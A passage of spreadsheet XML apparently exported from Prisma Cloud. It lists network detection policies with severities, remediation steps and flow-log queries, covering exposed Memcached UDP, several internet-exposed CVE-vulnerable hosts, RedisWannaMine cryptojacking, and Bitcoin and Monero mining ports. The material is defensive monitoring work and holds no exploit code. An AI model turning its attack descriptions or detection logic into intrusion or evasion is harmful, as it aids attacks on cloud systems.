          <t>MITRE ATT&amp;CK v10.0 [Deprecated], MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v8.2 [Deprecated], MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Matt's ATT&amp;ACK, MITRE ATT&amp;CK v12</t>
        </is>
      </c>
      <c r="B3521" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3521" s="2" t="inlineStr"/>
      <c r="D3521" t="inlineStr"/>
      <c r="E3521" t="inlineStr"/>
      <c r="F3521" t="inlineStr"/>
      <c r="G3521" t="b">
        <v>1</v>
      </c>
      <c r="H3521"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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3521" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="K3521" t="inlineStr">
        <is>
          <t>Memcached default UDP port is publicly accessible</t>
        </is>
      </c>
      <c r="L3521" t="inlineStr"/>
      <c r="M3521" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3521" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3521" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3521" t="inlineStr">
        <is>
          <t>network_event</t>
        </is>
      </c>
      <c r="Q3521" t="inlineStr">
        <is>
          <t>TA0040</t>
        </is>
      </c>
      <c r="R3521" t="inlineStr">
        <is>
          <t>T1498.002 - Network Denial of Service: Reflection Amplification (TA0040)</t>
        </is>
      </c>
      <c r="S3521" t="inlineStr"/>
      <c r="T3521" t="b">
        <v>0</v>
      </c>
      <c r="U3521" t="inlineStr">
        <is>
          <t>network_protection</t>
        </is>
      </c>
      <c r="V3521" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="W3521" t="inlineStr">
        <is>
          <t>This policy identifies Memcached which has a default UDP port publicly accessible. Memcached is a general-purpose distributed memory caching system. It is often used to speed up dynamic database-driven websites by caching data and objects in RAM to reduce the number of times an external data source (such as a database or API) must be read. Memcached having UDP port 11211 public accessible is often vulnerable to DDoS amplification attack. This policy aims at finding such a Memcached which has an UDP port open to the public. It is highly recommended disabling Memcached UDP port.</t>
        </is>
      </c>
      <c r="X3521" t="inlineStr">
        <is>
          <t>In order to mitigate the memcache DDoS attacks, please ensure the memmcache server is upto-date with latest version 1.5.6 or greater.
FMI : https://github.com/memcached/memcached/wiki/ReleaseNotes156
As a workaround you can also block/firewall UDP port 11211.</t>
        </is>
      </c>
      <c r="Y3521" t="inlineStr"/>
      <c r="Z3521" t="inlineStr">
        <is>
          <t>network from vpc.flow_record where protocol IN ( 'UDP' ) and dest.port = 11211 and bytes &gt; 0 AND source.publicnetwork IN ( 'Internet IPs' , 'Suspicious IPs' , 'AWS IPs', 'Azure IPs', 'GCP IPs' )</t>
        </is>
      </c>
      <c r="AA3521" t="inlineStr">
        <is>
          <t>Jonathan Brox</t>
        </is>
      </c>
      <c r="AB3521" t="inlineStr">
        <is>
          <t>2023-06-20 21:41:24</t>
        </is>
      </c>
      <c r="AC3521" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-109</t>
        </is>
      </c>
      <c r="AD3521" t="b">
        <v>1</v>
      </c>
      <c r="AE3521" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3521" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG3521"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1" t="inlineStr">
        <is>
          <t>c0ff55bf-6686-458e-9426-0a6566ab0f1b</t>
        </is>
      </c>
      <c r="AI3521" t="inlineStr">
        <is>
          <t>746183a3-88de-4b8c-a518-2ab2c3dbd249</t>
        </is>
      </c>
      <c r="AJ3521" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3521" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3522">
      <c r="A3522" t="inlineStr"/>
      <c r="B3522" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3522" s="2" t="inlineStr"/>
      <c r="D3522" t="inlineStr"/>
      <c r="E3522" t="inlineStr"/>
      <c r="F3522" t="inlineStr"/>
      <c r="G3522" t="b">
        <v>1</v>
      </c>
      <c r="H3522"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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3522" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="K3522" t="inlineStr">
        <is>
          <t>Instance affected by Argo CD vulnerability is exposed to network traffic from the internet [CVE-2022-24348]</t>
        </is>
      </c>
      <c r="L3522" t="inlineStr"/>
      <c r="M3522" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3522" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3522" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3522" t="inlineStr">
        <is>
          <t>network_event</t>
        </is>
      </c>
      <c r="Q3522" t="inlineStr"/>
      <c r="R3522" t="inlineStr"/>
      <c r="S3522" t="inlineStr"/>
      <c r="T3522" t="b">
        <v>0</v>
      </c>
      <c r="U3522" t="inlineStr">
        <is>
          <t>network_protection</t>
        </is>
      </c>
      <c r="V3522" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="W3522" t="inlineStr">
        <is>
          <t>This policy identifies Instances installed with Argo CD version vulnerable for CVE-2022-24348 and exposed to network traffic from the internet. It is recommended to upgrade the Argo CD version to the latest version and limit exposure to the internet.
For details:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-24348
NOTE: This policy is effective only when Prisma Compute is enabled in your environment.</t>
        </is>
      </c>
      <c r="X3522"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Argo CD related services then terminate the services and change the ACL to block the outgoing traffic.
5. If this instance is authorized to use Argo CD related services then upgrade Argo CD to the latest version to fix this vulnerability.</t>
        </is>
      </c>
      <c r="Y3522" t="inlineStr"/>
      <c r="Z3522" t="inlineStr">
        <is>
          <t>network from vpc.flow_record where bytes &gt; 0 AND dest.resource IN (resource where finding.type IN ('Host Vulnerability') AND finding.source IN ('Prisma Cloud') AND finding.name IN ('CVE-2022-24348')) AND source.publicnetwork IN ('Internet IPs', 'Suspicious IPs')</t>
        </is>
      </c>
      <c r="AA3522" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3522" t="inlineStr">
        <is>
          <t>2022-12-09 04:37:29</t>
        </is>
      </c>
      <c r="AC3522" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-950</t>
        </is>
      </c>
      <c r="AD3522" t="b">
        <v>1</v>
      </c>
      <c r="AE3522" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3522" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG3522"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2" t="inlineStr">
        <is>
          <t>886cab2c-68e9-4363-9d68-14876bd03969</t>
        </is>
      </c>
      <c r="AI3522" t="inlineStr">
        <is>
          <t>b98d3f5d-6fef-4528-b7cf-65fea2423998</t>
        </is>
      </c>
      <c r="AJ3522" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3522" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3523">
      <c r="A3523" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v6.3 [Deprecated], MITRE ATT&amp;CK v8.2 [Deprecated], MITRE ATT&amp;CK v8.2 [Deprecated], MITRE ATT&amp;CK v6.3 [Deprecated], CCPA 2018, PIPEDA</t>
        </is>
      </c>
      <c r="B3523" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3523" s="2" t="inlineStr"/>
      <c r="D3523" t="inlineStr"/>
      <c r="E3523" t="inlineStr"/>
      <c r="F3523" t="inlineStr"/>
      <c r="G3523" t="b">
        <v>1</v>
      </c>
      <c r="H3523"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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3523" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="K3523" t="inlineStr">
        <is>
          <t>RedisWannaMine vulnerable instances with active network traffic</t>
        </is>
      </c>
      <c r="L3523" t="inlineStr"/>
      <c r="M3523" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3523" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3523" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3523" t="inlineStr">
        <is>
          <t>network_event</t>
        </is>
      </c>
      <c r="Q3523" t="inlineStr">
        <is>
          <t>4.7</t>
        </is>
      </c>
      <c r="R3523" t="inlineStr">
        <is>
          <t>4.7.3</t>
        </is>
      </c>
      <c r="S3523" t="inlineStr"/>
      <c r="T3523" t="b">
        <v>0</v>
      </c>
      <c r="U3523" t="inlineStr">
        <is>
          <t>network_protection</t>
        </is>
      </c>
      <c r="V3523" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="W3523" t="inlineStr">
        <is>
          <t>RedisWannaMine is cryptojacking attack which aims at both database servers and application servers via remote code execution, exploiting an Apache Struts vulnerability. To inject cryptocurrency mining malware, RedWannaMine uses a transmission control protocol (TCP) scanner to check open port 445 of SMB and scans vulnerable Redis server database over port 6379(tcp), so that it can use EternalBlue to spread further.</t>
        </is>
      </c>
      <c r="X3523" t="inlineStr">
        <is>
          <t>1. Login to your cloud environment
2. Configure the firewall/security group rules for the default Redis server port 6379
3. Ensure that Redis server instances are not running with vulnerable SMB version (SMB v1) and make sure SMB Port 445 is not open for public access without proper authorisation, unless it's required.</t>
        </is>
      </c>
      <c r="Y3523" t="inlineStr"/>
      <c r="Z3523" t="inlineStr">
        <is>
          <t>network from vpc.flow_record where dest.resource IN ( resource where hostfinding.type IN ( 'Host Vulnerability' ) AND hostfinding.name IN ( 'CVE-2017-12629', 'CVE-2017-9805' ) )and bytes &gt; 0</t>
        </is>
      </c>
      <c r="AA3523" t="inlineStr">
        <is>
          <t>Jonathan Brox</t>
        </is>
      </c>
      <c r="AB3523" t="inlineStr">
        <is>
          <t>2023-06-20 21:41:23</t>
        </is>
      </c>
      <c r="AC3523" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-129</t>
        </is>
      </c>
      <c r="AD3523" t="b">
        <v>1</v>
      </c>
      <c r="AE3523" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3523" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG3523"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3" t="inlineStr">
        <is>
          <t>7abb5fbc-228b-4419-bf44-3d754c203268</t>
        </is>
      </c>
      <c r="AI3523" t="inlineStr">
        <is>
          <t>8374d874-2dfc-4f84-8d1f-66b49a149e8d</t>
        </is>
      </c>
      <c r="AJ3523" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3523" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3524">
      <c r="A3524" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B3524" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3524" s="2" t="inlineStr"/>
      <c r="D3524" t="inlineStr"/>
      <c r="E3524" t="inlineStr"/>
      <c r="F3524" t="inlineStr"/>
      <c r="G3524" t="b">
        <v>1</v>
      </c>
      <c r="H3524"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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3524" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="K3524" t="inlineStr">
        <is>
          <t>Instance affected by Java Psychic Signatures vulnerability is exposed to network traffic from the internet [CVE-2022-21449]</t>
        </is>
      </c>
      <c r="L3524" t="inlineStr"/>
      <c r="M3524" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3524" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3524" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3524" t="inlineStr">
        <is>
          <t>network_event</t>
        </is>
      </c>
      <c r="Q3524" t="inlineStr">
        <is>
          <t>4.1 Network</t>
        </is>
      </c>
      <c r="R3524" t="inlineStr">
        <is>
          <t>4.1.1 Network - All</t>
        </is>
      </c>
      <c r="S3524" t="inlineStr"/>
      <c r="T3524" t="b">
        <v>0</v>
      </c>
      <c r="U3524" t="inlineStr">
        <is>
          <t>network_protection</t>
        </is>
      </c>
      <c r="V3524" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="W3524" t="inlineStr">
        <is>
          <t>This policy identifies Instances installed with Oracle Java SE version vulnerable for CVE-2022-21449 and exposed to network traffic from the internet. It is recommended to upgrade the Java Psychic Signatures Oracle Java SE version to the latest version and limit exposure to the internet.
For details:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-21449
NOTE: This policy is effective only when Prisma Compute is enabled in your environment.</t>
        </is>
      </c>
      <c r="X3524"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Java Psychic Signatures Oracle Java SE related services then terminate the services and change the ACL to block the outgoing traffic.
5. If this instance is authorized to use Java Psychic Signatures Oracle Java SE related services then upgrade Java Psychic Signatures Oracle Java SE to the latest version to fix this vulnerability.</t>
        </is>
      </c>
      <c r="Y3524" t="inlineStr"/>
      <c r="Z3524" t="inlineStr">
        <is>
          <t>network from vpc.flow_record where bytes &gt; 0 AND dest.resource IN (resource where finding.type IN ('Host Vulnerability') AND finding.source IN ('Prisma Cloud') AND finding.name IN ('CVE-2022-21449')) AND source.publicnetwork IN ('Internet IPs', 'Suspicious IPs')</t>
        </is>
      </c>
      <c r="AA3524" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB3524" t="inlineStr">
        <is>
          <t>2023-07-20 18:11:20</t>
        </is>
      </c>
      <c r="AC3524" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-948</t>
        </is>
      </c>
      <c r="AD3524" t="b">
        <v>1</v>
      </c>
      <c r="AE3524" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3524" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG3524"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4" t="inlineStr">
        <is>
          <t>1b5efe58-038c-4501-be20-0f81b1a6291a</t>
        </is>
      </c>
      <c r="AI3524" t="inlineStr">
        <is>
          <t>916a83ac-8ca9-4c51-8b34-51e77b46b749</t>
        </is>
      </c>
      <c r="AJ3524" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3524" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3525">
      <c r="A3525" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B3525" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3525" s="2" t="inlineStr"/>
      <c r="D3525" t="inlineStr"/>
      <c r="E3525" t="inlineStr"/>
      <c r="F3525" t="inlineStr"/>
      <c r="G3525" t="b">
        <v>1</v>
      </c>
      <c r="H3525"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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3525" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="K3525" t="inlineStr">
        <is>
          <t>Instance affected by Text4shell RCE vulnerability is exposed to network traffic from the internet [CVE-2022-42889]</t>
        </is>
      </c>
      <c r="L3525" t="inlineStr"/>
      <c r="M3525" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N3525" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3525" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3525" t="inlineStr">
        <is>
          <t>network_event</t>
        </is>
      </c>
      <c r="Q3525" t="inlineStr">
        <is>
          <t>4.1 Network</t>
        </is>
      </c>
      <c r="R3525" t="inlineStr">
        <is>
          <t>4.1.1 Network - All</t>
        </is>
      </c>
      <c r="S3525" t="inlineStr"/>
      <c r="T3525" t="b">
        <v>0</v>
      </c>
      <c r="U3525" t="inlineStr">
        <is>
          <t>network_protection</t>
        </is>
      </c>
      <c r="V3525" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="W3525" t="inlineStr">
        <is>
          <t>This policy identifies Instances installed with Apache Commons Text project code version vulnerable for CVE-2022-42889 and exposed to network traffic from the internet. It is recommended to upgrade the Apache Commons Text project code version to the latest version and limit exposure to the internet.
For details:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-42889
NOTE: This policy is effective only when Prisma Compute is enabled in your environment.</t>
        </is>
      </c>
      <c r="X3525"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Apache Commons Text project code related services then terminate the services and change the ACL to block the outgoing traffic.
5. If this instance is authorized to use Apache Commons Text project code related services then upgrade Apache Commons Text project code to the latest version to fix this vulnerability.</t>
        </is>
      </c>
      <c r="Y3525" t="inlineStr"/>
      <c r="Z3525" t="inlineStr">
        <is>
          <t>network from vpc.flow_record where bytes &gt; 0 AND dest.resource IN (resource where finding.type IN ('Host Vulnerability') AND finding.source IN ('Prisma Cloud') AND finding.name IN ('CVE-2022-42889')) AND source.publicnetwork IN ('Internet IPs', 'Suspicious IPs')</t>
        </is>
      </c>
      <c r="AA3525" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB3525" t="inlineStr">
        <is>
          <t>2023-07-20 17:56:06</t>
        </is>
      </c>
      <c r="AC3525" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-956</t>
        </is>
      </c>
      <c r="AD3525" t="b">
        <v>1</v>
      </c>
      <c r="AE3525" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3525" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG3525"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5" t="inlineStr">
        <is>
          <t>73616259-9d31-4148-a076-984396bf7486</t>
        </is>
      </c>
      <c r="AI3525" t="inlineStr">
        <is>
          <t>8a6c5e4a-d7e1-4adc-affc-656ac6f65b74</t>
        </is>
      </c>
      <c r="AJ3525" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3525" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3526">
      <c r="A3526" t="inlineStr"/>
      <c r="B3526" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3526" s="2" t="inlineStr"/>
      <c r="D3526" t="inlineStr"/>
      <c r="E3526" t="inlineStr"/>
      <c r="F3526" t="inlineStr"/>
      <c r="G3526" t="b">
        <v>1</v>
      </c>
      <c r="H3526"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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3526" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="K3526" t="inlineStr">
        <is>
          <t>Instance affected by Samba vfs_fruit module remote code execution vulnerability is exposed to network traffic from the internet [CVE-2021-44142]</t>
        </is>
      </c>
      <c r="L3526" t="inlineStr"/>
      <c r="M3526" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3526" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3526" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3526" t="inlineStr">
        <is>
          <t>network_event</t>
        </is>
      </c>
      <c r="Q3526" t="inlineStr"/>
      <c r="R3526" t="inlineStr"/>
      <c r="S3526" t="inlineStr"/>
      <c r="T3526" t="b">
        <v>0</v>
      </c>
      <c r="U3526" t="inlineStr">
        <is>
          <t>network_protection</t>
        </is>
      </c>
      <c r="V3526" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="W3526" t="inlineStr">
        <is>
          <t>This policy identifies Instances installed with Samba vfs_fruit module version vulnerable for CVE-2021-44142 and exposed to network traffic from the internet. It is recommended to upgrade the Samba vfs_fruit module version to the latest version and limit exposure to the internet.
For details:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44142
NOTE: This policy is effective only when Prisma Compute is enabled in your environment.</t>
        </is>
      </c>
      <c r="X3526" t="inlineStr">
        <is>
          <t>1. Log in to the Cloud Console
2. Review the identified instance and investigate the network traffic to make sure that there is sufficient volume of egress traffic to indicate a compromise.
3. Log in to the host machine and make sure that there are no processes running that indicate a potential compromise.
4. If this instance is not authorized to process or host Samba vfs_fruit module related services then terminate the services and change the ACL to block the outgoing traffic.
5. If this instance is authorized to use Samba vfs_fruit module related services then upgrade Samba vfs_fruit module to the latest version to fix this vulnerability.</t>
        </is>
      </c>
      <c r="Y3526" t="inlineStr"/>
      <c r="Z3526" t="inlineStr">
        <is>
          <t>network from vpc.flow_record where bytes &gt; 0 AND dest.resource IN (resource where finding.type IN ('Host Vulnerability') AND finding.source IN ('Prisma Cloud') AND finding.name IN ('CVE-2021-44142')) AND source.publicnetwork IN ('Internet IPs', 'Suspicious IPs')</t>
        </is>
      </c>
      <c r="AA3526" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3526" t="inlineStr">
        <is>
          <t>2022-12-09 04:37:30</t>
        </is>
      </c>
      <c r="AC3526" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-951</t>
        </is>
      </c>
      <c r="AD3526" t="b">
        <v>1</v>
      </c>
      <c r="AE3526" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3526" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG3526"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6" t="inlineStr">
        <is>
          <t>66e81670-d734-47c4-8821-3f8965e24ac2</t>
        </is>
      </c>
      <c r="AI3526" t="inlineStr">
        <is>
          <t>1bcc564b-2f5e-4104-ab86-3bdd2acc68de</t>
        </is>
      </c>
      <c r="AJ3526" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3526" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3527">
      <c r="A3527" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v6.3 [Deprecated], NIST CSF v2.0, MITRE ATT&amp;CK v8.2 [Deprecated], MITRE ATT&amp;CK v8.2 [Deprecated], NIST CSF, NIST CSF, MITRE ATT&amp;CK v6.3 [Deprecated], CCPA 2018, PIPEDA, NIST CSF</t>
        </is>
      </c>
      <c r="B3527" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3527" s="2" t="inlineStr"/>
      <c r="D3527" t="inlineStr"/>
      <c r="E3527" t="inlineStr"/>
      <c r="F3527" t="inlineStr"/>
      <c r="G3527" t="b">
        <v>1</v>
      </c>
      <c r="H3527"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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3527" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="K3527" t="inlineStr">
        <is>
          <t>Instance is communicating with ports known to mine Bitcoin</t>
        </is>
      </c>
      <c r="L3527" t="inlineStr"/>
      <c r="M3527" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3527" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3527" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3527" t="inlineStr">
        <is>
          <t>network_event</t>
        </is>
      </c>
      <c r="Q3527" t="inlineStr">
        <is>
          <t>DE</t>
        </is>
      </c>
      <c r="R3527" t="inlineStr">
        <is>
          <t>DE.AE-1</t>
        </is>
      </c>
      <c r="S3527" t="inlineStr">
        <is>
          <t>Network</t>
        </is>
      </c>
      <c r="T3527" t="b">
        <v>0</v>
      </c>
      <c r="U3527" t="inlineStr">
        <is>
          <t>network_protection</t>
        </is>
      </c>
      <c r="V3527" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="W3527" t="inlineStr">
        <is>
          <t>This policy identifies network traffic from internal workloads to the known Bitcoin ports 8332 and 8333. Unless this traffic is part of authorized applications and processes, your instances may have been compromised.
Note: This policy alerts AWS and GCP workloads correctly and for Azure, it may trigger alerts for NAT Gateway configured resources also.</t>
        </is>
      </c>
      <c r="X3527" t="inlineStr">
        <is>
          <t>1. Log in to the Cloud Console
2. Review the identified instance and investigate the network traffic to make sure there is sufficient volume of egress traffic to indicate a compromise.
3. Log in to the host and make sure that there are no processes running that indicate a potential compromise.
4. If this instance is not authorized to process or host cryptocurrency related services, terminate the services and change the ACL to block outgoing traffic to port 8332, 8333.</t>
        </is>
      </c>
      <c r="Y3527" t="inlineStr"/>
      <c r="Z3527" t="inlineStr">
        <is>
          <t>network from vpc.flow_record where dest.port IN (8332,8333) and dest.publicnetwork IN ('Internet IPs' , 'Suspicious IPs' ) and src.resource IN ( resource where role not in ( 'AWS NAT Gateway', 'AWS ELB', 'AZURE ELB', 'GCP ELB')) AND accepted.bytes &gt; 0</t>
        </is>
      </c>
      <c r="AA3527" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3527" t="inlineStr">
        <is>
          <t>2023-04-14 05:48:11</t>
        </is>
      </c>
      <c r="AC3527" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-88</t>
        </is>
      </c>
      <c r="AD3527" t="b">
        <v>1</v>
      </c>
      <c r="AE3527" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3527" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG3527"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7" t="inlineStr">
        <is>
          <t>eea96170-da7c-4258-8ca2-71c3087049a7</t>
        </is>
      </c>
      <c r="AI3527" t="inlineStr">
        <is>
          <t>75a1e6f7-ce4d-441e-9cb2-002b634606df</t>
        </is>
      </c>
      <c r="AJ3527" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3527" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3528">
      <c r="A3528" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B3528" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3528" s="2" t="inlineStr"/>
      <c r="D3528" t="inlineStr"/>
      <c r="E3528" t="inlineStr"/>
      <c r="F3528" t="inlineStr"/>
      <c r="G3528" t="b">
        <v>1</v>
      </c>
      <c r="H3528" t="inlineStr">
        <is>
          <t>ALERT ALL test, Audit jmontufar, Azure AKS cluster Azure CNI networking not enabled, AzureDriftDetection, BG-AH-Email-Test, BPtestTag, Critical Misconfigs to ServiceNow, DM_TEST_GCP_test, Default Alert Rule, Exposed Cloud Functions, GCP Merchant, IAM Role not enabled, IAM-MA Alert Rule, JEC-Find all Security Groups that opens port 22 to the internet (and are attached to an EC2 instance)., KL_Test_Rule3, MA-90 days rotation, New Azure Subscription Created, New DNS record alert route 53, PCS - Basic Alert Rule, PCS Demo  - Prisma Cloud XSOAR Filter, PCS Demo Compute Alert Test, Ports open to the internet, Random v2, Ranti-Jira-Alert-rule, Ranti-rule-xsoar, RantiAlertRule-3, RaviAlert rule, Stella test, TEST, TEST/XN, Test23, alert-rule-tushir, anomalies-avega, ar-vstoyko, attack path, aws-ec2-public-ip, azure-sentinel-test-pk, benedict-alert-rule-BP, bgoldstein-webhook-test-rule, cj_test_tagBased, cku-Alert-Rule-01, cku-Alert-Rule-02, dluzardo - alert rule, jbrox-AlertRule-MSTeams-Email, jbrox-all-accounts-noDDoS-policy, jvp-alerts, kfirdaus-alert-rule, llatorre - Alert Rule, llatorre - Alert Rule -  AzurePCSLab Subscription, llatorre - Alert Rule -  K-Lo_TestAccount_Azure Subscription, manish alert exception report, manish test 1, manish test 2, manish test event exclude rule, mark davis test 412024, mbv-azure-appgw, mypersonal_compliance, mytest-2-alert, pagerduty-test, ranti-remediation test, splunk-test, tadenugba_Test_Rule, tadenugba_Test_Rule1, tag owner madavis1, test SI - XN, test-ebs, test-ebs-1, test-mms-may-15, test-yor-tushir, test1_alert_rules_20231006, testrule, testrule1, tushir-dell</t>
        </is>
      </c>
      <c r="I3528" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3528" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="K3528" t="inlineStr">
        <is>
          <t>AWS Lambda function communicating with ports known to mine Monero</t>
        </is>
      </c>
      <c r="L3528" t="inlineStr"/>
      <c r="M3528" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3528" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3528" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3528" t="inlineStr">
        <is>
          <t>network_event</t>
        </is>
      </c>
      <c r="Q3528" t="inlineStr">
        <is>
          <t>4.1 Network</t>
        </is>
      </c>
      <c r="R3528" t="inlineStr">
        <is>
          <t>4.1.1 Network - All</t>
        </is>
      </c>
      <c r="S3528" t="inlineStr"/>
